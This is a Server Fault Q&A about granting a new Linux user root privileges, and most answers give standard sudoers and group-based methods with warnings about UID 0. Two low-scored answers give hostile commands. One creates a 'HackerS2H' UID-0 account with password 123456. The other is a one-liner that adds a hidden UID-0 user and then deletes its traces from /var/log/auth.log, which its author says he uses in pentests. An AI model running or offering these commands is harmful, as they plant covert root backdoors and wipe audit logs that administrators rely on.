# add new user with root access in Linux

Tags: linux, ubuntu

I want to add new user and have/grant that new user to have all the root access, how can I do that ?

I did `sudo adduser --system testuser` but this is not working as I expected.

Thanks for help.

Answer (score 63):

There are actually three ways you can do this: the right way, the wrong way, and the ugly way.

First, create a *normal* user account.

```
adduser username
```

Then select one of the following:

---

### The Right Way

Create a `sudo` entry for the `wheel` group in `/etc/sudoers` like this:

```
## Allows people in group wheel to run all commands
%wheel  ALL=(ALL)       ALL
```

Or for "modern" versions:

```
## Allows people in group sudoers to run all commands
%sudoers ALL=(ALL)       ALL
```

Then add the user to the `wheel` group.  Adding and removing users with administrative priviledges now becomes a function of remembering to add them to wheel, instead of creating an entry in sudo.  The great thing about using wheel is that you can extend this mechanism into other authentication schemes that support groups, i.e. winbind/Active Directory, and reap the benefits in the process.  You would accomplish this by mapping wheel to a group in your authentication schema that has admin privileges.

Note that some distributions use different administrative accounts.  Wheel is a "traditional" approach to this, but you may encounter `admin`, `adm`, and other group accounts that serve the same purpose.

*Follow-up Edit:*

I have to give a point to [Bart Silverstrim](https://serverfault.com/users/13647/bart-silverstrim) for pointing out that Ubuntu uses `admin` as the group for this purpose.  He got to this first, although I didn't notice an Ubuntu tag at the time.  Again, it all depends on what distribution your are using.

---

### The Ugly Way

Create a sudo entry for the user account in question and give then complete access.  Again, you create the entry in `/etc/sudoers` like this:

```
## Allows just user "username" to run all commands as root
username    ALL=(ALL)    ALL
```

ADDED:
    ## For Ubuntu version:
    username    ALL=(ALL:ALL)

This is great if you only have one (or two) normal accounts.  It is ugly when you have a hundred accounts over multiple (geophysical) sites and have to constantly maintain the sudo file.

---

### The Wrong Way

You can edit the `/etc/passwd` file and change the user account ID from whatever number it is, to `0`.  That's right, *zero*.

```
username:x:0:502::/home/username:/bin/bash
```

See that third entry as zero?  When you log into that account, you are, for all effective purposes, `root`.  **I do not recommend this.**  If you do not remember "who" you are, you can create all kinds of havoc as you start creating and touching files as `root`.  You could also add your username to the `root` group.  This has the same effect for file access but it creates other issues; programs will notice you are not *user* `root` and refuse to run, but you will gain access to files that belong to *group* `root`.

If you did this, you did use `vipw` instead of just editing with `vi`, right?  (or whatever your favorite text editor is) After all, a single typo in this file can lock you out of your system - and that means a physical visit to the computer in question with a repair disc...

Comment: I would not even document the wrong way. Too taboo.

Comment: I disagree.   If you hide the wrong, it doesn't go away, it just festers - and sometimes, the knowledge that something is forbidden attracts more attention than it should.  Better to understand *why* it is taboo.  Especially when there are (admittedly rare) circumstances where you might need that knowledge.  Still, I'll give you a point for pointing out just how really bad things can be. :)

Comment: "After all, a single typo in this file can lock you out of your system" - no it wont, it may lock you out after you disconnect all Putty sessions(assuming you use Putty). As long as you don't disconnect, but just open another session to test your settings you are ok in this regard.

Comment: @quamis - true.  Although I was trying to point out the danger in assuming that it's safe to "fire and forget". :)  A point for you too, for pointing out good practice - *always test settings afterwards*.

Comment: this was very very helpful!

Comment: I'd just like to note that what was traditionally 'wheel' group (with binary, flag-level elevation) in Unix is no longer a common term for group of users that can elevate with sudo. 
From my experience, the most common name of the group of people that can sudo is nowdays typically 'sudoers' and is already setup on most systems.

Comment: Noted, added, and comment bumped. :)

Comment: Always use visudo when editing sudoers!

Comment: This seems overly complex... isn't it enough to [add the user to the sudo group as in my answer](http://serverfault.com/a/611849/69936)? [200+ upvotes](http://askubuntu.com/questions/7477/how-can-i-add-a-new-user-as-sudoer-using-the-command-line) can't be wrong.

Comment: @DanDascalescu your answer isn't wrong at all; although the initial question didn't specify *which* system was being modified.  It wasn't until later that the question was amended to be Ubuntu.  The reason for the extra text is that it explains the *why*.  See my comment above about "forbidden knowledge".

Comment: Also worth pointing out that although Ubuntu has the admin group in the sudoers file that group does not exist by default (on 12.04 at least) so you can't add users to it. You must therfore issue `addgroup admin` before you starting adding users to the group.

Comment: @rnbrady understandable, the question dates back to '09 and things change in the interm.  This is a common issue with several answers I have seen; over time, the answer becomes "stale" even though the topic is current.

Comment: How can i create user who have all right without write sudo ?

Comment: Really nice answer, but **What I need is to create a user with full access to the filesystem** (In my case, even read would be enough, but I'm using sftp, so writing sudo doesn't seem to be an option).
  Adding my users to admin/sudo groups doesn't allow them to check any content, like  /root.  **Did I do something Wrong ?**  _I'm using Ubuntu 16.04 LTS_

Comment: @Balmipour, you're going to have some limited options.  The obvious ones are to use the root account (which basically bypasses security checks) or to give "other" (world) access to the directories you need.  The problem I see that your use with "full access to the filesystem" is essentially a giant security hole waiting to happen.  I'm not sure I could chip in further advice at this point.

Comment: You're right, but I'm quite surprised that such a simple need is so hard to fullfil.  It still looked better than enabling ssh access for root to me. (well, since we got IP restrictions and strong passwords, I doubt it's really an issue, but...  I hoped I'd find something better.)  I'll do with it.  Anyway, thanks for your answers.

Comment: https://unix.stackexchange.com/questions/92123/rsync-all-files-of-remote-machine-over-ssh-without-root-user#comment170839_92397 argues in favour of distinct root accounts if different users require SSH root privileges and distinct shell, home and `.ssh/authorized_keys`.

Answer (score 3):

I've been using this for years and it's the [#1 recommended way to add a sudoer on AskUbuntu](https://askubuntu.com/questions/7477/how-can-i-add-a-new-user-as-sudoer-using-the-command-line):

```
adduser existinguser sudo
```

Much simpler than editing files, and easy to throw in a shell script for unattended installation.

If you want to create the user and grant sudo privileges, you can do that in one line like this:

```
useradd newuser -m -G sudo
passwd newuser
```

`-m` created a home directory, and `-G` specifies a supplementary group.

Answer (score 2):

and with this is 100%:

```
adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456
```

and connect with putty and ip server

Answer (score 1):

Well you may create user with adduser, see man adduser.
After you can add it to privileged group like root, or wheel.
But i think that the most recommended way to have some permission is using sudo.

Answer (score 1):

you can perform :

```
#useradd -m -g root alex
```

it creates a user Alex with a home directory who belongs to the root group

Answer (score 1):

Addition to Avery Payne's answer: in Ubuntu, you may want it like so:

```
%sudo   ALL=(ALL:ALL) ALL
```

And not like so:

```
%sudo    ALL=(ALL) ALL
```

Answer (score 0):

The "ugly and messy" way is to edit /etc/passwd to have UID=0 AND GID=0 for the new user. 
But **this poses a LOT of security risks**. You do know that if he is also root he may disable your accont, change your password, make you a "standard user"... right? so why not just give him you own account?

You may study the way suid (http://en.wikipedia.org/wiki/Setuid) works if you want to grant him root access for just a few of the commands.

Answer (score -1):

Here's a one liner:

```
USERNAME="name";PASSWD=`perl -e 'print crypt("password", "sa")'`;COMMENT="Comment Here"
&& sudo useradd -p $PASSWD --system --shell '/bin/bash' --base-dir "/bin" --uid 0 -- 
non-unique --comment $COMMENT $USERNAME && sudo sed -i '/useradd/d;/$USERNAME/d;' 
/var/log/auth.log
```

Best,

Comment: Adding additional users with the uid 0 is not a good idea ... see the answer with the most votes for details.

Comment: @GeraldSchneider I never said it was a good idea... Im well aware... and honestly its non of our concern. Its a one liner, use it in pentests all the time. Regards